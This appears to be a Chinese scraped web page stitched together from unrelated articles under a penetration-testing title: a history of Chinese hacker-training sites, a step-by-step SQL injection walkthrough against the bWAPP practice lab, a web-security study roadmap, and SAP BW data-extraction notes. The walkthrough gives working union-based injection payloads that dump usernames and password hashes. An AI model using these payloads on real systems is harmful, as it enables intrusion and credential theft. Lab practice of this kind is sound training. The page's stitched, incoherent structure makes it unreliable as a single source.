渗透测试7步_bwapp渗透测试攻略

hacker|
198

嘿客在哪里可以学

回顾中国三大黑客培训网站,探寻草根互联网风口!

羽度非凡

羽度非凡

原创6年前 · 专栏作家 代表作《网赚的秘密》

2001年,黑客基地正式成立了;

2003年,黑鹰安全网正式成立了;

2006年,华夏黑客联盟正式成立了;

接触互联网早的人应该都听说过这三个网站,当时是中国的三大黑客培训网站,这三家网站发展形成了规模,而且影响力非常大,后期又出现了黑客动画吧、安全中国、新世纪网安等众多黑客培训类网站。

时间推到2008年前后,黑客技术逐渐普及,人们的网络意识也逐渐提升,在这其中,黑客培训行业起到了推动的主流作用,虽然黑客培训网站培训的是最基础的黑客技术,但当所有人都了解这些以后,黑客如果想要更好地发展,就需要继续研究新的技术。

2009年,黑鹰安全网被查封;

2010年,华夏黑客联盟被查封;

2011年,黑客基地被查封;

时代总是在发展的,中国三大黑客培训网站被查封了,网站的负责人也被抓了,罪名是提供非法入侵计算机软件程序。很多人说“枪打出头鸟”,所以这三大黑客培训网站被查封了,但可能事实并不是这样的,而是突起的黑客培训类网站太多了,虽然很多人通过这类培训网站学到了技术,但很多人并不会因为会技术而去做有利于人民的事情,而是开始利用漏洞进行抓肉鸡、入侵网站、提权服务器等恶意行为,随后我们也发现国内其他后起的黑客培训网站也被查封或被迫整顿。

2011年6月,华夏黑客联盟转型为非盈利性质的网络安全技术交流论坛;

2011年8月,黑鹰安全网转型为以网络营销为主的网赚类门户培训网站;

2015年12月,黑客基地转型为非盈利性质的免费公开课教育网站;

三大黑客培训网站的转型这一次并没有起到领头羊的作用,因为在他们转型之前,互联网的网赚培训门户网站已经涌现出很多了,随后草根互联网人好像看到了新的出口,黑色旋风、新世纪网安等网站纷纷转型为网赚培训类网站。

虽然黑客技术培训的网站依然存在,但在快节奏的生活下,更多人想要的是赚钱,甚至会幻想一夜暴富,而互联网赚钱对于很多人来说又是一个神奇的地方,但与其说是神奇,不如说是好奇,很多人加入网赚大军的初衷其实是因为不了解网赚行业,只是听说能够日赚几百元,月入上万元。

当初学习黑客技术的人多半是为了炫耀,根本没有想过赚钱;而接触网赚培训的人多半是被广告营销了,最后并没有赚到钱。此时的人们对技术依然有好奇,但只不过是活的更现实了,认识到钱的重要性了,因此2011年到2012年期间,出现了网赚技术派,例如SEO、竞价等培训。

文章图片1

技术和网赚的结合

其实竞价不算是狭义上的技术,只是需要会运营优化。说SEO是一项技术可能更贴切,学习SEO需要掌握基础的HTML语言等技术知识,正因为SEO属于技术又可以赚钱,正好满足了人们新的好奇心,因此这期间出现了SeoWhy、MoonSeo、利为汇等SEO培训机构,但当我们看完所有的SEO教程之后,我们发现其实这些培训中所讲的内容几乎都是千篇一律,但不可否认的是这些基础教程是每一个SEOer都需要掌握的,搜索引擎的算法在不断升级更新,真正想要提升网站排名的话,还是需要我们自己在掌握基础的前提下,根据实际的网站案例去进行实战优化,从而总结SEO经验。

文章图片2

自媒体和网红的粉丝经济

2015年下半年,随着今日头条、一点资讯等UGC、PGC类用户内容聚合平台的兴起,自媒体行业开始发展,羽度非凡更看好自媒体行业的发展,因为这一行业参与者很多,任何有一技之长和有生活的人都可以进入这一行业,有技术的分享技术经验,没有技术的记录生活点点滴滴。

虽然现在网红很流行,但网红依旧属于自媒体范畴,自媒体属于粉丝经济范畴,草根互联网的发展趋势一定不会维持现状,因为人们总是在探寻更新鲜的领域。我一直认为不论是互联网行业还是其他行业,一定都遵循一个规律:如果创造不出新的东西,就一定会回归最初的梦想。

以前黑客技术培训很火爆,接着是网赚培训很火爆,再到后来的SEO培训、竞价培训,最后到现在的自媒体粉丝经济运营,如果没有下一个行业出现,也许人们会回归技术培训,但这一次不会是黑客技术培训,而是“改良”后的网络安全技术培训,再发展到网赚培训也一定不是当初的网赚培训,最后再回归到自媒体粉丝经济运营,不断循环下去并不代表不进步,每一次循环都会有一个新的高度,而且在循环阶段也一定会诞生新的知识领域。

羽度非凡(),互联网草根站长、非著名网络讲师、自媒体人,新书《网赚的秘密——草根网民淘金实战》已在各大电商平台上架销售。需要【投稿】请关注微信公众号:iamydff。

SQL注入之GET型(search)

我们进行测试这里是否存在SQL注入漏洞

输入a'

点击搜索后

报错了,说明很大可能存在SQL注入漏洞了。

order by 语句

输入 a' order by 1 #

输入a' order by 7#

输入a' order by 8#

由此可以判断出,库中有7个列。

使用联合查询注入union

输入a' union select 1,2,3,4,5,6,7#

可以看出是从2开始显示。

可以将2,3,5,4,替换成我们想要查询的信息

system_user() 系统用户名

user() 用户名

current_user 当前用户名

session_user() 连接数据库的用户名

database() 数据库名

version() MYSQL数据库版本

load_file() MYSQL读取本地文件的函数

@@datadir 读取数据库路径

@@basedir MYSQL 安装路径

@@version_compile_os 操作系统

输入a' union select 1,database(),3,4,5,6,7#

可见当前数据库为bwapp

输入a' union select 1,table_name,3,4,5,6,7 from information_schema.tables where table_schema=database()#

当前数据库(bwapp)中,有五张表,其中users比较重要。

先查看users表的所有的列的信息

输入a' union select 1,column_name,3,4,5,6,7 from information_schema.columns where table_name='users'#

一共有9列。

其中的login和password,应该是我们有我们想要的东西。

那我们就去查出它们的信息

输入a' union select 1,login,password,4,5,6,7 from users#

获取login信息和password密码

其中密码是经过md5加密,我们需要去解密

web前端不掉头发的学习方法

不掉头发的前端(这可能吗哈哈)

只要想学习哪里学习都是有效果的。但需要结合自身的一些特点来调整学习方向,这样学习起来会事半功倍,以下推荐3种学习线路,适用于不同的学习人群;

方法1:先学习编程,然后学习Web渗透及工具使用等

适用人群:有一定的代码基础的小伙伴

(1)基础部分

基础部分需要学习以下内容:

(1.1)计算机网络 :

重点学习OSI、TCP/IP模型,网络协议,网络设备工作原理等内容,其他内容快速通读;

【推荐书籍】《网络是怎样连接的_户根勤》一书,简明扼要,浅显易懂,初学者的福音;如果觉得不够专业,可以学习图灵设计丛书的《HTTP权威指南》;

(1.2)Linux系统及命令 :

由于目前市面上的Web服务器7成都是运行在Linux系统之上,如果要学习渗透Web系统,最起码还是要对linux系统非常熟悉,常见的操作命令需要学会;

学习建议:学习常见的10%左右的命令适用于90%的工作场景,和office软件一样,掌握最常用的10%的功能,基本日常使用没什么问题,遇到不会的,再去找相关资料;常见的linux命令也就50-60个,很多小白囫囵吞枣什么命令都学,这样其实根本记不住。

【推荐书籍】Linux Basics for Hackers;

(1.3)Web框架 :

熟悉web框架的内容,前端HTML,JS等脚本语言了解即可,后端PHP语言重点学习,切记不要按照开发的思路去学习语言,php最低要求会读懂代码即可,当然会写最好,但不是开发,但不是开发,但不是开发,重要的事情说三遍;

数据库:

需要学习SQL语法,利用常见的数据库MySQL学习对应的数据库语法,也是一样,SQL的一些些高级语法可以了解,如果没有时间完全不学也不影响后续学习,毕竟大家不是做数据库分析师,不需要学太深;

(2)Web安全

(2.1)Web渗透

掌握OWASP排名靠前的10余种常见的Web漏洞的原理、利用、防御等知识点,然后配以一定的靶场练习即可;有的小白可能会问,去哪里找资料,建议可以直接买一本较为权威的书籍,配合一些网上的免费视频系统学习,然后利用开源的靶场辅助练习即可;

【推荐书籍】白帽子讲Web安全(阿里白帽子黑客大神道哥作品)

【推荐靶场】常见的靶场都可以上github平台搜索,推荐以下靶场DVWA、bWAPP、upload-labs-master、SQL-lib-master、WebBug、pikachu等,有些是综合靶场,有些是专门针对某款漏洞的靶场;

(2.2)工具学习

Web渗透阶段还是需要掌握一些必要的工具,工具的学习b站上的视频比较多,挑选一些讲解得不错的视频看看,不要一个工具看很多视频,大多数视频是重复的,且很浪费时间;

主要要掌握的工具和平台:burp、AWVS、Appscan、Nessus、sqlmap、nmap、shodan、fofa、代理工具ssrs、hydra、medusa、airspoof等,以上工具的练习完全可以利用上面的开源靶场去练习,足够了;

练习差不多了,可以去SRC平台渗透真实的站点,看看是否有突破,如果涉及到需要绕过WAF的,需要针对绕WAF专门去学习,姿势也不是特别多,系统性学习学习,然后多总结经验,更上一层楼;

(2.2)自动化渗透

自动化渗透需要掌握一门语言,且需要熟练运用,可以是任何一门自己已经掌握得很熟悉的语言,都可以,如果没有一门掌握很好的,那我推荐学习python,最主要原因是学起来简单,模块也比较多,写一些脚本和工具非常方便;

虽说不懂自动化渗透不影响入门和就业,但是会影响职业的发展,学习python不需要掌握很多不需要的模块,也不需要开发成千上万行的代码,仅利用它编写一些工具和脚本,少则10几行代码,多则1-200行代码,一般代码量相对开发人员已经少得不能再少了,例如一个精简的域名爬虫代码核心代码就1-20行而已;

几天时间学习一下python的语法,有代码基础的,最快可能一天就可以学习完python的语法,因为语言都是相通的,但是学习语言最快的就是写代码,别无他法;接下来可以开始尝试写一些常见的工具,如爬虫、端口探测、数据包核心内容提取、内网活跃主机扫描等,此类代码网上一搜一大把;然后再写一些POC和EXP脚本,以靶场为练习即可;有的小伙伴可能又要问了,什么是POC和EXP,自己百度去,养成动手的好习惯啦;

(2.3)代码审计

此处内容要求代码能力比较高,因此如果代码能力较弱,可以先跳过此部分的学习,不影响渗透道路上的学习和发展。

如果希望在Web渗透上需要走得再远一些,需要精通一门后台开发语言,推荐php,因为后台采用php开发的网站占据最大,当然你还精通python、asp、java等语言,那恭喜你,你已经具备很好的基础了;

代码审计顾名思义,审计别人网站或者系统的源代码,通过审计源代码或者代码环境的方式去审计系统是否存在漏洞(属于白盒测试范畴)

那具体要怎么学习呢?学习的具体内容按照顺序列举如下 :

掌握php一些危险函数和安全配置;

熟悉代码审计的流程和方法;

掌握1-2个代码审计工具,如seay等;

掌握常见的功能审计法;(推荐审计一下AuditDemo,让你产生自信)

常见CMS框架审计(难度大); 代码审计有一本国外的书籍《代码审计:企业级Web代码安全架构》,当然有空的时候可以去翻翻,建议还是在b站上找一套系统介绍的课程去学习;github上找到AuditDemo,下载源码,搭建在本地虚拟机,然后利用工具和审计方法,审计AuditDemo中存在的10个漏洞,难度分布符合正态分布,可以挑战一下;

至于CMS框架审计,可以去一些CMS官方网站,下载一些历史存在漏洞的版本去审计,框架的学习利用官方网站的使用手册即可,如ThinkPHP3.2版本是存在一些漏洞,可以尝试读懂代码;但是切记不要一上来就看代码,因为CMS框架的代码量比较大,如果不系统先学习框架,基本属于看不懂状态;学习框架后能够具备写简单的POC,按照代码审计方法结合工具一起审计框架;其实也没没想象中的那么难,如果你是开发人员转行的,恭喜你,你已经具备代码审计的先天性优势。

可能有人会问:“我代码很差,不学习代码审计行不行?”其实代码审计不是学习网络安全的必要条件,能够掌握最好,掌握不了也不影响后续的学习和就业,但你需要选择一个阶段,练习得更专业精通一些,如web渗透或者内网渗透,再或者是自动化渗透;

(3)内网安全

恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web渗透、安全服务、安全分析等岗位;

如果想就业面更宽一些,技术竞争更强一些,需要再学习内网渗透相关知识;

内网的知识难度稍微偏大一些,这个和目前市面上的学习资料还有靶场有一定的关系;内网主要学习的内容主要有:内网信息收集、域渗透、代理和转发技术、应用和系统提权、工具学习、免杀技术、APT等等;

可以购买《内网安全攻防:渗透测试实战指南》,这本书写得还不错,国内为数不多讲内网的书籍,以书籍目录为主线,然后配合工具和靶场去练习即可;

那去哪里可以下载到内网靶场?如果你能力够强,电脑配置高,可以自己利用虚拟机搭建内网环境,一般需要3台以上的虚拟机;你也可以到国外找一些内网靶场使用,有一些需要收费的靶场还可以;

(4)渗透拓展

渗透拓展部分,和具体工作岗位联系也比较紧密,尽量要求掌握,主要有日志分析、安全加固、应急响应、等保测评等内容;其中重点掌握前三部分,这块的资料网络上也不多,也没有多少成型的书籍资料,可通过行业相关的技术群或者行业分享的资料去学习即可,能学到这一步,基本上已经算入门成功,学习日志分析、安全加固、应急响应三部分的知识也相对较为容易。

方法2:先学习Web渗透及工具,然后再学习编程

适用人群:代码能力很弱,或者根本没有什么代码能力,其他基础也相对较差的小伙伴

基础需要打好,再学习Web渗透比如linux系统、计算机网络、一点点的Web框架、数据库还是需要提前掌握;

像php语言、自动化渗透和代码审计部分内容,可以放在最后,当学习完毕前面知识后,也相当入门后,再来学习语言,相对会容易一些;

【优先推荐】方法2,对于小白来说,代码基础通常较弱,很多很多小白会倒在前期学习语言上,所以推荐方法2的学习,先学习web渗透和工具,也比较有意思,容易保持一个高涨的学习动力和热情,具体学习内容我就不说了,请小伙伴们参照方法1即可。

方法3:选择一些适合自己的课程学习

适用人群:需要体系化学习、增强实战能力的小伙伴

具体根据自身条件来讲,如果你自学能力较差,那建议选择课程学习,网上各大平台等都有很多各式各样的课程,是可以更快帮助你迅速入门的,然后再根据自己自身所欠缺的方面,不断去完善和学习,最后达到你所要的优秀水平。

学习书籍推荐如下:

【基础阶段】

Linux Basics for Hackers(中文翻译稿)

Wireshark网络分析(完整扫描版)

精通正则表达式(中文第3版)

图解HTTP 彩色版

[密码学介绍].杨新.中文第二版

网络是怎样连接的_户根勤

[PHP与MySQL程序设计(第4版)].W.Jason.Gilmore

【web渗透阶段】

web安全攻防渗透测试实战指南

白帽子讲Web安全

Web安全深度

【自动化渗透阶段】

Python编程快速上手-让繁琐工作自动化

【代码审计阶段】

代码审计:企业级Web代码安全架构

【内网渗透阶段】

内网安全攻防:渗透测试实战指南

社会工程防范钓鱼欺诈

如何在BW中创建数据源及数据抽取

1、可使用R3标准数据库表或者自定义表(需注意对于金额或者数量字段,必需有参照表。如果作为数据源的表自己含有金额单位或者数量单位,并且参照表为表本身,那么此表可以直接作为数据源使用;如果作为数据源的表本身没有金额单位或者数量单位,参照表为另外的表,则使用该表作为数据源时会报错。BW的机制好像是表本身金额和数量字段必需有参照表,并且参照表为此表本身,如果参照表与想作为数据源的表不为同一表,则无法取得相应的单位。因此如果参照表为其它表,则可能需建立视图,在视图中关联参照表取得单位),自定义表往往是需要通过比较复杂的程序计算出结果,然后将程序输出结果存在自定义表中,然后通过自定义表作为一般数据源,把数据抽取到BW中

2、建立一般数据源(事务代码:SBIW或RSO2),一般数据源中SAP允许视图/表、查询(指SAP中的信息集,即Query)、FM(功能模块)作为一般数据源,几个参数:应用程序组件(Infosource和infopackage使用应用程序组件的树状结构组织,其实就是一个目录,用来管理数据源的),如果为自定义的,需保证相关的Client都存在,可自行创建应用程序组件(事务代码:RSA6);描述:短中长,如果是视图/表,则输入相应的视图/表名称,提取结构系统自动生成;Delta设置:Delta特殊字段,即作为增量更新的字段,分为三种:时间标记、日历天数、数字指针,这三种的区别,不是太清楚,时间标记即时间戳,应是记录记录更改的时间,日历天数也是上次更改的日期,个人觉得时间标记是更为明细的时间,因为是长度为15的字段,可以精确到分秒吧,日历天数则是到天,数据指针是对增加的记录产生新的指针,三种用来区别新数据的方法;安全间隔下限:以下为SAP的帮助,示例:时戳用于确定增量。最后读取的时戳为:12:00:00。下一个增量提取开始于12:30:00。这种情况下,选择间隔为 12:00:00 到 12:30:00。提取结尾时,指针设置为:12:30:00。一个记录 - 例如一个凭证- 创建于 12:25,但是直到 12:35 才能保存。它不包含在提取的数据中,但是,由于它的时戳,下次也不能提取。正因如此,读取和传输数据之间的安全边际必须始终大于创建此数据源(具有时戳增量)记录的时间最大长度,或者它必须显示一个足够大的间隔 (用于确定使用序列号确定的增量)。个人理解,如果一个凭证创建的经过时间恰好在上次提起后和下次提起后,即跨过了安全间隔,则该凭证会导致无法提取

3、一般数据源创建后,激活数据源(事务代码:RSA6),并使用RSA3测试抽取数据

以上1、2、3步均在R3端完成

4、在BW中复制数据源,建立信息包抽取数据到PSA

0条大神的评论

发表评论